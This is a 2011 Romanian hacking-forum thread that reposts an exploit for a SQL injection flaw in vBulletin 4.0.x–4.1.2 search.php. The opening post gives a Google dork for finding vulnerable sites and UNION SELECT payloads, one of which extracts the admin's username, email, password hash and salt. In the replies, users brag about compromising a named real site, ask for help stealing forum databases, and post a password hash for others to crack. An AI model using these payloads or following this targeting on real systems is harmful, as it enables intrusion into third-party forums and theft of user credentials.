Nytro Posted May 23, 2011 Report Posted May 23, 2011 vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability====================================================================#vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability#====================================================================# ## 888 d8 888 _ 888 ,d d8 ## e88~\888 d88 888-~\ 888 e~ ~ 888-~88e ,d888 _d88__ ## d888 888 d888 888 888d8b 888 888b 888 888 ## 8888 888 / 888 888 888Y88b 888 8888 888 888 ## Y888 888 /__888__ 888 888 Y88b 888 888P 888 888 ## "88_/888 888 888 888 Y88b 888-_88" 888 "88_/ ## #====================================================================#PhilKer - PinoyHack - RootCON - GreyHat Hackers - Security Analyst#====================================================================#[+] Discovered By : D4rkB1t#[+] Site : NaN#[+] support e-mail : d4rkb1t@live.comProduct: http://www.vbulletin.comVersion: 4.0.xDork : inurl:"search.php?search_type=1"--------------------------# ~Vulnerable Codes~ #--------------------------/vb/search/searchtools.php - line 715;/packages/vbforum/search/type/socialgroup.php - line 201:203;--------------------------# ~Exploit~ #--------------------------POST data on "Search Multiple Content Types" => "groups"&cat[0]=1) UNION SELECT database()#&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#More info: http://j0hnx3r.org/?p=818--------------------------# ~Advice~ #--------------------------Vendor already released a patch on vb#4.1.3.UPDATE NOW!====================================================================# 1337day.com [2011-5-21]====================================================================Sursa: vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection VulnerabilityInfo: vBulletin® 4.x SQL Injection Vulnerability « J0hn.X3rE public (thanks "d") de ceva timp, dar vad ca acum apare si pe exploit-db.Video Demonstration by TinK: Quote
trxtxx Posted May 23, 2011 Report Posted May 23, 2011 ba astia nu pot sa se abtina sa nu devina ei faimosi au distrus bunatate de exploit. Nu i-am inteles niciodata pe astia ce vor sa publice ei tot si nici macar nu sunt ale lor in marea majoritate a cazurilor. Quote
Paul4games Posted May 24, 2011 Report Posted May 24, 2011 Eu nu prea cred ca a gasit tipul asta exploitul,am citit despre vulnerabilitatea asta acum o luna si ceva pe blogul lui:vBulletin® 4.x SQL Injection Vulnerability « J0hn.X3r Quote
Nytro Posted May 24, 2011 Author Report Posted May 24, 2011 Da, si eu tot de el stiu, si stiu de destul timp de acel post. O fi cine stie ce plagiator ratat, sau o fi aceeasi persoana... Quote
Guest Mosad Posted May 24, 2011 Report Posted May 24, 2011 Din ce-am vazut eu un quote scrie "More info: http://j0hnx3r.org/?p=818". Quote
xpaulx Posted May 25, 2011 Report Posted May 25, 2011 (edited) Poftiti o scurta demonstratie facuta de mine pe alphazone.ro acum o luna: Alphazone Pwned on Vimeo@paul4games: nu , nu el a gasit vulnerabilitatea. Tipul asta care a postat-o pe 1337day si exploit-db e un skid de pe hackforums pe nume majidemo. Edited May 25, 2011 by xpaulx 1 Quote
Stealth2 Posted May 25, 2011 Report Posted May 25, 2011 Poftiti o scurta demonstratie facuta de mine pe alphazone.ro acum o luna: Alphazone Pwned on VimeoAm facut si eu unu acum 1 luna jumate, in care aratam cum sa fie exploatat. Quote
mah_one Posted May 31, 2011 Report Posted May 31, 2011 de ce da database error?.....ca nu inteleg.......Picz.ro - GAZDUIRE IMAGINI Quote
Bebee Posted May 31, 2011 Report Posted May 31, 2011 de ce da database error?.....ca nu inteleg.......Picz.ro - GAZDUIRE IMAGINISunt unele variante nulled pe care nu le poti exploata. Quote
ZyreXX Posted June 1, 2011 Report Posted June 1, 2011 stie careva cum pot si eu sa iau o baza de date sau sa intru in ftp pe un forum are vbuletin 4.1.2 va rog Quote
marcus21 Posted June 2, 2011 Report Posted June 2, 2011 deja la doua am reusti ...dar problema ii parola criptata:( Quote
ZyreXX Posted June 2, 2011 Report Posted June 2, 2011 Fratilor in video nu inteleg nimic scrisu prea mic !!! Quote
poq Posted June 2, 2011 Report Posted June 2, 2011 (edited) Dai full screen + 720p. Sper sa te ajute.Daca deja ai incercat probabil "e de la tine". Edited June 2, 2011 by poq Quote
ZyreXX Posted June 2, 2011 Report Posted June 2, 2011 aha dar eu nu inteleg:(, ma ajuta si pe mine cineva sa iau baza de date dp un forum Quote
marcus21 Posted June 2, 2011 Report Posted June 2, 2011 (edited) baza de date nu o poti lua asa doar dupa ce faci rost de user si parola de la admin si atunci deabea poti sa o furiedit: reuseste careva sa gaseasca parola?Leonight : d4644b1f0c83a6686f47cf67215c4fa6 Edited June 2, 2011 by marcus21 Quote
ZyreXX Posted June 2, 2011 Report Posted June 2, 2011 marcus da te rog id tau sau da tu add darky_pglarea please Quote
marcus21 Posted June 3, 2011 Report Posted June 3, 2011 ce nu intelegi din video? explica foarte bine Quote
VADEЯR Posted June 5, 2011 Report Posted June 5, 2011 cum pot afla parola de la has daca nu am salt? Quote
negrutidaniel Posted June 7, 2011 Report Posted June 7, 2011 smart laggers use script for auto pown them Quote